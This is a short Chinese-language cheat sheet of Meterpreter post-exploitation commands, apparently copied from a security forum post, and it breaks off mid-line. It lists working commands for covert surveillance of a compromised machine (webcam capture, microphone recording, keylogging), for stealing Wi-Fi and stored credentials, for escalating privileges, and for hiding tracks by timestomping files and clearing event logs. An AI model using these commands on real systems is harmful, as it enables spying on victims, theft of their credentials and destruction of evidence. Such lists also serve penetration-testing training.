https://xz.aliyun.com/t/2536
meterpreter后渗透命令
background 将会话切换到后台
sessions -l
sessions -i 2 启动一个shell或一个meterpreter
sessions -k 2 杀死shell
upload /root/桌面/payload.txt c:
edit payload.txt
cat ls c: rmdir rm download
screenshot 截屏
webcam_list 列出所以摄像头
webcam_snap 拍照
webcam_stream 录制实时视频
file:///root/bapsdkjf.html 查看视频
record_mic 利用麦克风录制环境声音 -d 设置录制的时间(秒)
idletime 计算空闲时间,在空闲时间内发动攻击
keyscan_start
keyscan_dump
keyscan_stop
getuid
getsystem 提权
timestomp
-v 显示信息
-z 修改时间如timestomp -z “11/23/2020 15:23:34” payload.txt
-b 清除时间信息
run post/windows/wlan/wlan_bss_list 获取附近无线网络
run post/windows/wlan/wlan_profile 或却wifi密码
run get_application_list 获取应用程序列表
run post/windows/gather/credentials/ 获取这种密码
search -f *.txt *.doc 查找文件
clearev 清除所有日志
shell
reboot
sysinfo
ps
kill
getpid
uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标
uictl disable mouse #禁用鼠标
uictl disable keyboard #禁用键盘
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
migrate <pid值> #将Meterpreter会话移植到指定pid值进程中
ipconfig/ifconfig
netstat –ano
arp
getproxy #查看代理信息
route #查看路由
portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
run autoroute –h #查看帮助
r